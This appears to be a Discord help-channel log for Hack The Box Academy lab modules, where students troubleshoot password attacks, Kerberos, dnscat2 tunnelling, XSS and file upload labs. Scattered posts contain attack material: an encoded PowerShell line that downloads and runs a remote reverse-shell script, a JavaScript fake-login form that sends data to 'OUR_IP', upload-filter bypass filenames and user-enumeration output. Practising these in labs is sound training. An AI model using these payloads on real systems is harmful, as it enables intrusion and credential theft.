#modules

1 messages · Page 445 of 1

sterile solstice
tacit flint
#

no curl fails after trying for some time

quaint marsh
#

OOOOOOOOOOOHHH ahahahaha

#

That makes sense

sterile solstice
#

i mean, its a good password list but may not give you what you want 😉

sterile solstice
quaint marsh
#

It's because I used locate / xato and used the file that ended in .txt without reading the whole thing

#

thanks tho!

rustic sage
sterile solstice
#

realistically, you should google your issue where you have a connection, something like "VM won't connect to websites" and go throguh the steps

rustic sage
#

why would u use a password list to fuzz for username?

#

i dont think there's a benefit for that

sterile solstice
# quaint marsh thanks tho!

haha its all good mate. ive done even more silly things before. always helps to have another set of eyes for those things.

sterile solstice
rustic sage
#

Oh lmao, all good

sterile solstice
#

i mean, i could be wrong with that being the issue. but password list for users is still not ideal lol.

rustic sage
#

yeah

#

htb wouldnt do that i think

quaint marsh
#

Can confirm, just found the username

sterile solstice
#

great!

heady sapphire
#

Hello ! I am stuck in password attack skill assessment .

#

I got initial access via ssh and found credentials for hwilliam but I don’t know how to proceed

devout lily
#

Getting Started - Knowledge check
Hi everyone, yesterday i used msf to exploit the target and it worked, but now it says that the target is not vulnerable, some help? I have spawned the target today, so its not expired

devout delta
#

Hello Members,

Can anyone help with Value Fuzzin Topic

curl -X POST -d “id=<I have the value>” http://admin.academy.htb:30746/admin/admin.php but I am not able to get the Flag as it say "you do not have the access" what dose it means

#

did you manage to get the answer as it says for me that = You do not have access to it

trail willow
#

does any once completed Android Application static analysis module?

devout delta
#

did you manage to get an answer ? , I am stuck at the same

tacit flint
# sterile solstice realistically, you should google your issue where you have a connection, somethi...

Network works at layer 3 (IP/ICMP) → your VM can reach external hosts by IP.
Network fails at layer 4 (TCP 80/443) → connections for web/apt/curl are blocked.
DNS works, so name resolution isn’t the problem.
Firewall inside VM is not the issue.
HTB VPN or NAT mode is likely interfering with outbound TCP connections.
Conclusion: The VM’s TCP traffic is being blocked due to network mode (NAT vs bridged) or host firewall / routing.

#

i still dk whats going on .. ive been stuck here for 2 days now

heady sapphire
#

I am stuck at password attack skill assessment . I got initial access and found william credentials but I do not know how to proceed …

brave field
#

Read the sections again carefully and you'll then come to understand what you were doing wrong.

silver ocean
#

Whenever I try to unzip SOCKS over RDP zip...
.dll is automatically deleted...any solutions....windenf is OFF

brave field
full echo
reef axle
#

Hello all, Ive almost completed my BBH path should I wait or take the exam

burnt jewel
#

Hello, may someone help me reall quick please?

grand timber
#

https://academy.hackthebox.com/module/77/section/852

Ive been following the guide so far and have seemed to somehow gotten myself stuck. the file is uploaded, but i cant seem to get the directory pull inorder to get the information needed to continue. any clue what I did wrong?

full patio
#

Guys, I'm on https://academy.hackthebox.com/module/143/section/1455

Trying to solve the question as follows, but I keep getting the same error and with no outbound Internet access on ea-attack01 I'm unable to sync the time, but from what I can tell, there's no issue with the time.

||┌─[htb-student@ea-attack01]─[/opt]
└──╼ $sudo kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt

__             __               __     

/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / /
/ / / / /
/ / /
/ __/
/
/|
|_
// /.
// _,/_/___/

Version: dev (9cfb81e) - 08/16/25 - Ronnie Flathers @ropnop

2025/08/16 09:48:54 > Using KDC(s):
2025/08/16 09:48:54 > 172.16.5.5:88

2025/08/16 09:48:54 > [+] VALID USERNAME: jjones@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: sbrown@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: tjohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: jwilson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: bdavis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: njohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: asanchez@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: dlewis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: ccruz@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [!] mmorgan@INLANEFREIGHT.LOCAL - KRB Error: (11) KDC_ERR_NEVER_VALID Requested starttime is later than end time
||

sharp torrent
#

I’m doing the aen module and ||I noticed an AD group doesn’t display as vulnerable in bloodhound||, but in the walkthrough it does display as vulnerable. I’ve tried installing the newest bloodhound software (which I thought was via docker) and it’s still not displaying. Am I doing something wrong ?

full patio
#

I've tried syncing the time with the DC using ntpdate, but ntpdate is not available on the machine 🤷‍♂️
||sudo ntpdate -s 172.16.5.5||

grand timber
full patio
#

Cheers - no rdate, but I'll try a change in the VPN 👍

#

No, vmware. Kali, with Windows as the base machine

unkempt ore
#

can someone help me understand something in the way live targets works ?
I've put the vpn but when i visit the link its the default apache page,
and for the vhost i don't understand i just have the name

calm jasper
#

Hallo!

full patio
#

Absolute star ⭐ - It was something to do with the VPN region. Thanks for the advice! 💪

full patio
unkempt ore
#

Well i guess the target ip should be a vulnerable web app, but i get the default page, and in the module they talk about vhost like exploitserver.htb where we put our payload but i just have the name not the ip

calm jasper
full patio
calm jasper
#

HAHAH-

#

Naw

unkempt ore
#

Advanced XSS and CSRF Exploitation - the lab warmup 😢

grand timber
unkempt ore
#

well thats what i don't understand the other web module i tried was more simple, it just had an ip with the vulnerable app,
i don't understand what do i have to do to connect to the vulnerable website and send the payload

#

im sorry its maybe a stupid question but i really don't understand how the setup works

#

but i don't have any ip for them

#

hooo i self host ?

#

yes

full patio
#

@unkempt ore - I think you would benefit from reading a bit about the basics of vhosts. Then your understanding of them and how to interact with them will become simpler for you.

unkempt ore
#

I agree i just used vhost once for selfhosting with a custom name but didn't searched more on what it does

#

can i dm ?

#

Okay my bad i had two devices on the vpn that why i guess it wasn't working, Thanks All

tawny maple
#

moderator is staff btw, just wanted to let you know if youre not staff dont pretend to be. you can confuse people especially if you only text in vague two word sentences.

acoustic owl
left lintel
trail willow
shut wraith
#

Connect all home network

#

It will be fun

mellow light
#

I have a trouble I`m doing password attack module and I have a last question: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. I got user and password but smb shares only have one privilege READ ONLY in IPC$ share

#

I got username and password using netexec smb module. And active shares. But then when I checked them with SMBMAP I found that all shares except IPC$(READ ONLY) have denied access. So I cant get a flag: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

formal oriole
#

is the only different the name? Or in other words, the module is still completely relevant if the cme is substituted for nxc?

brave field
dry falcon
#

Attacking Thick Client Applications
https://academy.hackthebox.com/module/113/section/2139
i modify 554.bat file and run it and just create 2 file in c:\programdata but HTB say it will create 3 files .

-a----        3/24/2023   1:01 PM            273 monta.ps1
-a----        3/24/2023   1:01 PM         601066 oracle.txt
-a----        3/24/2023   1:17 PM         432273 restart-service.exe```
but i see in screenshort one file `restart-service.exe` is missing . what to do ?
gray yacht
mellow light
#
*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.129.202.136:445    Name: 10.129.202.136          Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    CASSIE                                                NO ACCESS    
    IPC$                                                  READ ONLY    Remote IPC
mellow light
valid gate
#

Hey guys, does anybody know of some boxes that I could use as practice for Pass the Ticket attacks on both Windows AND Linux domain joined systems?

agile oasis
#

Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.

For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache

At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)

But I get this error below. I tried alot to solve this issue but still the eroor is here.

Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41

  • ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]
  •                           ~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
    • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session

Sorry Im new to htb discord. I'm not sure if its the right place to ask questions.
Thankyou!

cloud urchin
#

The error has fullyqualified in it which leads me to believe it may be related to not putting inlanefreight.local in your hosts file

agile oasis
cloud urchin
#

yeah just use the target IP

gray yacht
mellow light
gray yacht
mellow light
agile oasis
# cloud urchin yeah just use the target IP

hosts:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.42.198 inlanefreight.local

but still the same error.

cloud urchin
agile oasis
cloud urchin
#

ok so do you still get the error on your kali box

cloud urchin
agile oasis
#

Clarification:
my Attack host ip: 10.10.14.216
Target ip given: 10.129.42.198

  1. I tried to run nslookup from the target to my attack host.
  2. I edited my host file on my attack host as you said.
cloud urchin
#

the original error you posted was due to running ruby dnscat2.rb on your kali box. to rectify that error you should first try adding the spawned ip into your hosts file with inlanefreight.local

#

then try running the ruby command again to see if the error still happens

agile oasis
cloud urchin
#

oh i'm sorry i misread your first post, i see you posted results from both boxes i thought it was only the kali box

agile oasis
#

No worries. So what should I do?

cloud urchin
#

are you running powershell as admin?

agile oasis
#

yes

#
  1. I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
  2. UDP connection is working as well.
    exhausted chatgpt gemini as well to sort out the error. This is last resort.
dense pagoda
#

Hi

cloud urchin
#

i am not sure i would probably need to see the full setup, your commands seem fine

dense pagoda
#

Please I need help

mellow niche
cloud urchin
#

@dense pagoda This server isn't for that.

dense pagoda
#

Where can I find a server for that please

cloud urchin
#

How t f would we know

#

we don't do illegal crap

dense pagoda
#

Okay

#

Sorry

mellow niche
#

if i want practice material, is academy a good alternative to retired boxes?

agile oasis
cloud urchin
cloud urchin
mellow niche
#

ok i need a good playbook and to learn

cloud urchin
#

Then yes you want Academy

mellow niche
#

are you able to recommend where i should start in academy (any must-have modules?), or should i just pick what interests me?

cloud urchin
mellow niche
cloud urchin
reef axle
#

Hello all, I need some advice I've almost completed my BBH path, would you recommend me to take the exam, or after the update.

full patio
#

Is it just me, or does anyone else find that the output flag -o <filename.txt> doesn't work with userenum? The command runs through, but the output file is empty. 🤷‍♂️

quiet trout
#

I just finished Firewall evasion easy https://academy.hackthebox.com/module/19/section/117

Anyone have a minute to talk about the hint? I was unable to tell if a certain part of it was helpful or not though i ultimately didnt make use of it and curious if i missed out on the benefit of something

#

prob best for DMs so I dont spoil

fervent wadi
#

Hi 🙂

quiet trout
lucid light
#

hi i need help, im doing the "Linux Fundamentals" and im at "System Information", the problem im having is connectiong using ssh, i spawn a target, i type everything correct "ssh hbt-student@10.129.246.44" but when i press enter, nothing happens, its just blank, then after ~2min i get this ssh: connect to host 10.129.227.96 port 22: Connection timed out. Help please! i aint trying to get stuck here.

#

Any moderators on who can help?

modest lily
plain summit
#

In Password Attacks Pass the Ticket (PtT) from Linux:
I'm getting this error for this command:

smbclient //dc01/julio -k -c 'get julio.txt' -no-pass

Error:

gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER
#

I successfuly ran the cp and export command in this module prior to this.

lucid light
#

@sharp cove can you help us?

modest lily
lucid light
night forum
#

Hi Guys.
What do you know about instagram security?
is it a profession?

modest lily
lucid light
sharp cove
lucid light
lucid light
#

@cloud urchin are you there?

cloud urchin
#

Please do not randomly ping people. Just ask your question here and if someone is can and willing to help they will.

lucid light
#

Are you willing to help?

cloud urchin
#

i am busy, but your error is network related. make sure you're on the vpn and not using the pwnbox at the same time.

lilac beacon
#

Anyone into CTF here?

cloud urchin
dark hedge
#

nope. @compact patrol is a bot though

devout lily
#

Hi everyone, can someone explain how does the Nmap host discovery works? Particulary about the type of packet sent

dark hedge
devout lily
hazy grotto
dark hedge
#

why it sends a packet to 80 and 443, i'm not really sure

devout lily
dark hedge
#

from the way the documentation is written, it doesn't sound like those ports are even being scanned. Nmap just sends a packet to them

#

but maybe that's not true. if you run the command, if it doesn't specifically show 80 and 443 in the results, then it's not scanning those ports

quiet trout
#

Anyone got a sec for the nmap firewall hard lab? I feel like i should be getting a flag (finally) but im... not?

#

maybe i need to restart box. let me try that real quick now that i have my lil approach

devout lily
dark hedge
#

you don't have to read all of it, but you should have a basic understanding of what the tool is doing

hazy grotto
#

Hello

#

Dang i was going to try and help but I don't think i did that section. Looks like they have updated a few sections on that module since i did it. Sorry brother

alpine mural
#

No problem!

#

thanks!

plain summit
zealous sand
#

Hey! by any chance, is there any one who had already finished the updated Password Attacks SkillAssessment?
I finished it when there were 3 parts but now it's updated and I can't see a way to go further after accessing through ssh. Module says there are 4 internal hosts (172.16.119.X) but only 2 are reachable.

plain summit
#

In Password Attacks Pass the Certificate:
When trying to run:

python3 gettgtpkinit.py -cert-pfx ../pywhisker/pywhisker/1UCYb0YS.pfx -pfx-pass '1P9EvC2tKKJlBSum4Ej4' -dc-ip targetIP INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache

I get this error:

2025-08-16 20:43:06,994 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 302, in amain
    ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 47, in from_pfx
    with open(pfxfile, 'rb') as f:
         ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '../pywhisker/pywhisker/1UCYb0YS.pfx'
sterile solstice
sterile solstice
#

if you need to, find the absolute filepath to the file, and use that

plain summit
#

oh ok

cloud urchin
#

@alpine mural Please take care not to post content from modules above tier 0

alpine mural
#

OK.

sterile solstice
#

i wouldnt include the password for the user in that lol

cloud urchin
#

There is no need to post details at all. Anyone who has done the module and can help knows the details. Just state the module/section/question you're on, maybe post the error itself, or obfuscate things. Best to take it to DMs if you feel like you need to reveal a little more.

alpine mural
#

aaa...ok.

#

I got this error in Pass the certificate in passwords attacks.I cant get the .pfx . I dont undestand the reason.

sterile solstice
# alpine mural aaa...ok.

its part of the terms of service that you don't share information for modules above tier0. they dont want ppl searching through chats to find the answer to things instead of figuring it out. you can ask for help obviously, just don't give away key bits of information (especially since others will wont to do modules in the future, and what is seen can't be unseen ...)

alpine mural
#

Yes,yes...my error, sorry.

#

If the lasts picture are wrong, let me know and DM to you

sterile solstice
#

ah, so i think the issue is OpenSSL.CRYPTO as its a known issue. if i remember correctly, you have to patch that specific pkinittools

#

i know someone who setup a pyenv just for this fix/patch so he didn't have to patch and unpatch the issue moving forward.

alpine mural
sterile solstice
#

let me know if that solves the problem

alpine mural
#

Yes!! Works now!

#

Thanks!

#

I have the .pfx

sterile solstice
#

you may need to undo that patch for future work, so just keep that in mind

alpine mural
#

Yes. I create a env , and i put in my notes the link and the step by step to do.

sterile solstice
#

great work

brave field
# devout lily I am reading the documentation and this is what is says about the -sn option: "T...

-sn in Nmap means "ping scan only" (no port scanning).

That means Nmap will only check if the host is alive (host discovery), not enumerate open ports.

When Nmap tries to decide if a host is up, it doesn’t just send ICMP Echo (ping). Many networks block ICMP. So, by default, it also sends:

ICMP Echo request

TCP SYN to port 443 (HTTPS)

TCP ACK to port 80 (HTTP)

ICMP timestamp request

These are not port scans in the sense of “check all ports systematically”. They are simply probes to elicit any response from the host. If the host replies, Nmap marks it as "up". If not, it may mark it as down (unless you disable host discovery with -Pn).

full echo
supple dragon
#

if you still need help with this, feel free to DM me fingerguns

opal shuttle
surreal goblet
#

can anyone help me with nibbles

#

im not about to get a reverse connection

#

anyone?

brave field
surreal goblet
#

ive save my php file and tried to get a reverse response when i curl it but i got no resopnse

brave field
#

show with screenshots what you're doing, it's a tier0 module so no problem spoiling it

surreal goblet
#

wait a moment

#

can you specife what should it send

brave field
#

your process of getting the reverse shell

surreal goblet
#

can i share my screen

#

?

burnt creek
#

Hello, I'm struggling with XSS assessment.
I can't even get a callback to my web server in any input field, with all the payloads from the module (and much more). I tested variants of the payload I got success with for session hijacking exercise.
Moreover, when shuting down the machine and starting a fresh one, I do not get the same results each spawn. Sometime I see my comment appear, with a "waiting for moderation" note, sometime I do not see my comments. On spawns where I see my comments, I suspect there is some kind of filter on < character, completely eluding my payloads, as I get errors duplicate messages for such cases.
I saw in some messages that the payload should be simple, but it does not look like working for me.
Are you still able to perform XSS on the website ? Any tips otherwise ?
Thank you

buoyant escarp
#

Which modules cover CSRF?

#

For beginner*

opal shuttle
#

use search feature..it will show all the modules regarding that

buoyant escarp
#

Ty

north frigate
#

Cheers 🙂 Is sqlplus supposed to be pre-installed on pwnbox? I came across two instances in the CJCA-path which read like sqlplus should already be installed 😄

river grove
burnt creek
river grove
burnt creek
river grove
agile oasis
#

Can anyone help me with dnscat2? I am getting error while connecting from client to server. Thankyou!

burnt creek
river grove
burnt creek
agile oasis
#

Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.

For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache

At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)

But I get this error below. I tried alot to solve this issue but still the eroor is here.

Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41

  • ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]
  •                           ~~~
    
    • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
    • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session
burnt creek
agile oasis
#

I am local host on windows machine (which is part of lab). Running powershell as an admin.

void matrix
#

Hii anyone help me

#

For some details

cloud urchin
#

@void matrix Not that kind of server. This server is for discussion about HTB.

spiral sapphire
#

Anyone care to help me a little bit? I'm stuck on the "Windows Lateral Movement" module, Section "Windows Remote Management" and Question #3 with getting the flag on DC01 as Leonvqz.

I can forge the user's ticket but can't "Enter-PSSession" been stuck for quite some time now..

#

I've tried everything I can think of and nothing seems to work. I'd highly appreciate if someone could just give me small nudge

strange otter
agile oasis
#

the error is on client side.

#

When I initiate connection from client side, the server gives me prompt where it says connection established, at the same time the client side (which is windows part of lab) gives this error.
I think client-server are struggling to maintain the connection.

#

I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
UDP connection is working as well.
exhausted chatgpt gemini as well to sort out the error.

burnt creek
devout delta
#

anyone can help with the payload crafting

document.createElement('form');f.action='http://OUR_IP';f.method='POST';var u=document.createElement('input');u.type='text';u.name='username';u.placeholder='Username';f.appendChild(u);var p=document.createElement('input');p.type='password';p.name='password'

winter silo
#

If somebody manages it and tells me Ty

acoustic owl
winter silo
#

Ok

devout delta
#

Guys, I am stuck with the XXS I have the payload which is working perfect but when I am trying to send it via SEND ME A URL its says invalid url

#1024429874246590575

devout delta
grim gust
#

Module Intro to C2 Operations with Sliver

How Would I execute this command against an sliver listner

execute-assembly /mnt/hgfs/HTB/www/GodPotato-NET4.exe -cmd "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA1AC4AMgA5AC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAFIAdQBuAC4AcABzADEAIgApAAoA"

⚠   Injected .NET assembly arguments are limited to 256 characters when using the default fork/exec model.
Consider using the --in-process flag to execute the .NET assembly in-process and work around this limitation.
verbal turtle
#

hi im in Advanced SQL Injections module and i think there is problem with instance

#

error: port 8080 already in use

quiet trout
#

how deep are you in the scenario? can you restart the box perhaps its soggy?

#

if its not too much of a hassle i woudl restart the target and then try to laucnh the application again and see ifyou get the same error.

#

until someone who's done the module before can give some better help

quiet trout
# verbal turtle i did and same problem

i cant be of MUCH more help here but i would try

sudo lsof -i :8080

and see if you can identify whats running on the port.

if that is no help try nmap on 8080 with an -sV

or perhaps giving it a port other than 8080 to run on? (if like something ELSE thats NOT your sql server is running on 8080 and needs to be)

if the sql server is running on 8080 maybe try kill or pkill or whatever then retry

south marten
#

hello, someone can help me in whitelist filters on file upload attacks module

#

yea, i know where the files are uploaded

#

but i not found my shell

#

y probe shell.php, shell.jpg, shell.php.jpg

#

etc etc

#

y use php list with the intruder, and i have liker 3 succesfully uploads

#

the others give the error " only image allowed " or " extension not allowed"

#

i use this
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

#

and i use it with the intruder

#

okay, but i already have 3 with succefully uploads

#

i use it too

#

okay

#

wait , i send again the intruder with the other list

#

and 2 more

#

i delete it after

#

its only to show how im doing the thinks

#

whats PM? im not english, i dont know all the abbreviation

#

dm?

quiet trout
#

Private Message

#

the original DM

south marten
#

okay okay, i was reading pm and i dont know jhajsajsa

#

that make sens

#

new word learned

quiet trout
#

i did this module a year ago but dont remeber it

#

but i do remember that being a headache

opal shuttle
#

i think awoken is high lmao

#

😂

#

bro cracked every possible word could be generated

#

hahah

#

@cunning canopy which exam you are preparing for?

sacred ermine
#

anyone can help with
using crackmapexec module
skills assessment
stuck on the second question, already got the s*** user, and I cannot go further from in there

opal shuttle
#

its illegat

#

we dont promote any illegegal activies here

errant herald
opal shuttle
#
  • 2nd..you are in wrong channel
#

only modules related chat here

errant herald
errant herald
rain hawk
#

Hello everyone
Can anyone suggest me ...how to take note the modules in HTB academy and Linux app...!!?

opal shuttle
sick stump
#

Hey guys in the Password attacks module , the section Pass the hash https://academy.hackthebox.com/module/147/section/1638

I already solved the question with mimikatz.exe, but I wanted to know is it possible to use netexec to achieve all the NTLM hashes using a local administrator hash?

I thought of dumping the lsa secrets, but it only got me the plain text password, and when I tried to dump the SAM database it didnt show any NTLM hashes for the user David

Thanks in advance

rain hawk
opal shuttle
nova knot
#

Hey, if anyone is currently working on CPTS, please reach out to me!! I'm on web proxies and moving forward from there!!

acoustic owl
gray yacht
left lintel
#

Oh I didn’t see Ricky responded

sacred ermine
gray yacht
mystic jay
#

Hi, has anyone completed LLM Output Attacks module from AI red teamer path?
I managed to get the admin key and the hashed admin password. I am trying to use the admin bot but have not been able to know where the flag is. https://academy.hackthebox.com/module/307/section/3597

grand timber
#

do I need to nmap??

brave field
grand timber
#

Oh okay

#

The example uses port 9443 so ig ill use thay

silver ocean
quiet trout
#

im headed in the right direction and now what i need to do, just having some problems picking the right direction to focus on due to the time sink involved with 4-5 options

storm elk
mystic jay
quiet trout
quiet heart
#

What happens when you finish all Hack The Box modules? Because you have nothing to keep your streak going on. But if I finish all the modules, how can I continue my streak?

soft reef
#

Anyone available for some help on HTTP Attacks the TE.CL request smuggling?

storm elk
#

This isn’t a hacker for hire server though

#

If it’s illegal, this isn’t the place for it

livid bear
#

Cyber line
Am lost i need help

storm elk
#

Don’t ask to ask, if you need help with a module, name the module and section 🙂

umbral holly
#

anyone else's Pwnbox terminate while they were practicing linux commands in the linux fundamentals module?

shut wraith
#

How come I do
inline-execute-assembly /home/kali/Tools/CustomCollection/SpoolSample.exe 'dc01 srv01'
But my rubeus monitor only catchs the srv01 tgt which is the one im monitoring from trying to get the dc01 tgt...

shut wraith
#

sliver module section = kerberos

#

could it be because the TGT for the DC01 is already cached ? so the delegation does not occur after checking if the TGT is already there ?

storm elk
#

Haven’t done this module, sorry 🙂 but I’m sure someone else has

violet pollen
#

hey guys can you help me out here

shut wraith
#

Bro I skip those

#

U learn the name then what happens

violet pollen
#

like is that a glitch or something

shut wraith
#

Are u gonna be mega hax0r

shut wraith
violet pollen
#

no i have actually started today so i just want to learn

shut wraith
#

Good job

violet pollen
#

hello

#

Components of a Network

wary plover
#

What?

violet pollen
violet pollen
weak vapor
violet pollen
#

its showing wrong thats why i am asking

#

it accepted the below answers "fire wall"

fair charm
weak vapor
#

have you tried IP?

fair charm
#

can someone explain why i keep getting this error in the pass the certificate section from the password attacks module

violet pollen
weak vapor
weak vapor
violet pollen
#

thanks

weak vapor
sick stump
#

@fair charm

violet pollen
# weak vapor TCP/IP

"OMG IT WORKED WITH CAPITALS " lol i did not know it htb answers are case sensitive

violet pollen
#

hoo i dont know i am new to htb and every thing

weak vapor
#

guys I just got a message saying GG on leveling up! You can type /rank to see your rank card in HackTheBox. 😉
what does that mean?

weak vapor
#

/rank

#

yep nothing happened

#

holly shit what is slow mode?

#

so I can't make more than one message in 5 seconds?

real delta
violet pollen
weak vapor
violet pollen
#

really thanks mate 🙂

fair charm
frail grove
#

For Credential Hunting in Network Traffic they have you download a pcapng file to analyze but I don't have a VM to check this, I just connect to the workspace. How do I transfer it over?

weak vapor
#

So I tried and tried to solve this question but nothing worked, and ChatGPT was no good either, everything it suggested failed. Anyone has an idea how can I solve this question?

#

how do I attach an image here?

south marten
#

hello, need helps in skills on file upload module

violet pollen
solemn moon
south marten
#

already 🫡

storm elk
#

Verifying your account will give you image permissions here

weak vapor
storm elk
#

#welcome has all the required info to do so

weak vapor
#

why could that be

violet pollen
storm elk
#

👋

south marten
storm elk
weak vapor
#

thx guys

violet pollen
frail grove
#

ah that's right

quiet trout
violet pollen
storm elk
#

No shifts, we’re all volunteers 🙂

violet pollen
#

so you stay all time online ?

quiet trout
#

i thin khe means they volunteer on their own time

#

as possible

storm elk
violet pollen
#

hoo okay

weak vapor
#

I tried random answers until I got it right

#

but I want to know how is it really solved?

#

I know I should start with curl then grep then sort then wc
the problem is with using grep, it returnes the entire line and not only the link, that way I can't use sort correctly

south marten
weak vapor
#

any suggestions?

south marten
quiet trout
#

i have no spam/trash or anything

south marten
quiet trout
#

I do i receive an inbox with no email

south marten
#

can you send me what u recieve, im looking my notes and i have 2 folders

fair charm
#

what could be the issue here ?

storm elk
#

@still flint no need to post a dot as a message twice

still flint
storm elk
#

No worries, this channel is to discuss Academy modules. If you want to chat in #general please read and follow instructions of #welcome

#

It’s three simple steps

fair charm
#

nvm

#

i figured it out

weak vapor
#

any ideas?

cloud urchin
#

@weak vapor Please take care not to post answers from modules

weak vapor
#

I need help with this question

late junco
#

need help with these two questions in Footprinting Module DNS Section

weak vapor
#

besides, gobuster needs wordlists

late junco
weak vapor
#

how much manually do you mean? I won't read the whole think and count

#

I tried grep but it keeps being the wrong answer, so I'm guessing I'm using it wrong

late junco
weak vapor
#

linux fundamentals

#

filter contents page

#

task 3

late junco
#

check DM

cloud hawk
fossil blade
#

hi guys im trying to solve the AD enumeration and attacks module

and im connected to a host via SSH.
im trying to clone kerbrute from github but i get this message.
Cloning into 'kerbrute'...
fatal: unable to access 'https://github.com/ropnop/kerbrute.git/': Could not resolve host: github.com

help please

quaint cliff
#

it is normal htb target machines dont have internet connection

quaint cliff
somber bison
#

Given the capture file st /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in hex and ascii?

#

“-rX ~/tmp/capture.pcap” and its wrong

crystal cove
#

Hi chat, in *Coercing Attacks & Unconstrained Delegation *of the Windows Attacks & Defense module, do you know where can i find the Coerce executable to run the Coerce command ? I ran a locate and a find on both my home and the /usr/share/. but no sign of it.

somber bison
#

nvm

rustic sage
#

hi. i dont have permission to send messages in the general chat

#

maybe i used the link from the academy thats why ? or no ?

gray yacht
rustic sage
#

thanks

rustic sage
gray yacht
rustic sage
#

ok

gray yacht
# rustic sage ok

I found the post. Let me see if I can find someone online that can help.

neat dune
#

I've been slowly working on the "Using the Metasploit Framework" project. I'm currently focusing on sessions and jobs, but I'm getting an error. I did some research, and everything I'm finding suggests that the target is either not vulnerable or has already been patched. Am I missing something, or did I do something wrong?

#

Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Pi-Hole version 0 is ≥ 5.3 and not vulnerable "set ForceExploit true
to override check result.

alpine mural
#

Hi! Im in Skills Assessment of Password Attacks: I get initial foothold with the username b*** and the password given. After that I found the credentials of user h*** and pivot to J01. Then, the only thing I could think of was to use Snuffler, and it says I have access to FILES01, but when I try to get there from my host (I pivoted with ligolo), it tells me I don't have access.
I can't figure out how to get to the SMB of files01. Can anyone give me a clue?

gray yacht
somber bison
#

I am confused

#

Infronto network traffic analysis

#

Interrogating network traffic with capture and display filter

#

what do i even do to answer the questions i dont see any file or anything

#

OHHH THE REAOURCES IM DUMB NVM

alpine mural
silver ocean
#

how can I add color to text in sysreptor report...chatgpt is not helping

#
if I wan to turn this code red...
  
shut wraith
#

